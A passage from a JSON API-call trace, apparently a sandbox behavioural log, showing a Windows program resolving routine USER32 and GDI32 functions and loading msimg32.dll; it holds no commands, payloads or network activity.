"0" }, { "name": "FunctionAddress", "value": "0x766339a0" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-03-02 21:32:32,060", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EqualRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f360" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-03-02 21:32:32,060", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnumWindows" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663a020" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-03-02 21:32:32,060", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnumThreadWindows" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766433c0" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-03-02 21:32:32,076", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnumChildWindows" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76644120" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-03-02 21:32:32,076", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EndPaint" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652090" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-03-02 21:32:32,076", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EndDeferWindowPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638d90" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-03-02 21:32:32,076", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnableWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650840" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-03-02 21:32:32,076", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnableScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766956b0" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-03-02 21:32:32,092", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnableMenuItem" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76630bc0" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-03-02 21:32:32,107", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawTextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76632df0" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-03-02 21:32:32,107", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawMenuBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663b350" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-03-02 21:32:32,107", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawIconEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635d80" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-03-02 21:32:32,123", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawIcon" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635d50" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-03-02 21:32:32,123", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawFrameControl" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766391f0" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-03-02 21:32:32,123", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DrawEdge" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76632b20" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DispatchMessageW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766462e0" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DispatchMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638560" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DestroyWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651ee0" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DestroyMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651ec0" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DestroyIcon" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650a00" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-03-02 21:32:32,139", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DestroyCursor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650a00" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-03-02 21:32:32,154", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DeleteMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651e70" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-03-02 21:32:32,154", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DeferWindowPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766379e0" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-03-02 21:32:32,154", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DefWindowProcA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771d8620" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-03-02 21:32:32,170", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DefMDIChildProcA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76630c50" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-03-02 21:32:32,170", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DefFrameProcA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76632fd0" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-03-02 21:32:32,170", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CreatePopupMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c8c0" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-03-02 21:32:32,185", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CreateMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c590" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-03-02 21:32:32,185", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CreateIcon" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7666f1d0" } ], "repeated": 0, "id": 238 }, { "timestamp": "2025-03-02 21:32:32,185", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ClientToScreen" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634ae0" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-03-02 21:32:32,185", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CheckMenuItem" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766317c0" } ], "repeated": 0, "id": 240 }, { "timestamp": "2025-03-02 21:32:32,201", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CallWindowProcA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634830" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-03-02 21:32:32,201", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CallNextHookEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664be50" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-03-02 21:32:32,201", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "BeginPaint" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651c90" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-03-02 21:32:32,201", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "BeginDeferWindowPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638610" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CharNextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634000" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CharLowerBuffA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7669b190" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CharLowerA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c130" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CharToOemA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76692f30" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "AdjustWindowRectEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663e240" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-03-02 21:32:32,217", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ActivateKeyboardLayout" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766518b0" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "msimg32.dll" }, { "name": "ModuleHandle", "value": "0x004e72ee" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\msimg32" }, { "name": "DllBase", "value": "0x73fc0000" } ], "repeated": 0, "id": 252 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "msimg32.dll" }, { "name": "BaseAddress", "value": "0x73fc0000" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "msimg32.dll" }, { "name": "ModuleHandle", "value": "0x73fc0000" }, { "name": "FunctionName", "value": "GradientFill" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73fc1460" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "gdi32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "UnrealizeObject" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064800" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-03-02 21:32:32,232", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "StretchBlt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063e10" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetWindowOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063d90" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetWinMetaFileBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7706b810" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetViewportOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77063f10" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetTextColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066e90" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetStretchBltMode" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77067300" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetROP2" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770644c0" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-03-02 21:32:32,248", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetPixel" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77065300" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetEnhMetaFileBits" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77068b80" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetDIBColorTable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770683c0" } ], "repeated": 0, "id": 266 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetBrushOrgEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x770683a0" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetBkMode" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066fc0" } ], "repeated": 0, "id": 268 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SetBkColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77066f00" } ], "repeated": 0, "id": 269 }, { "timestamp": "2025-03-02 21:32:32,264", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SelectPalette" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77064370" } ], "repeated": 0, "id": 270 }, { "timestamp": "2025-03-02 21:32:32,279", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "SelectObject" }, { "name": 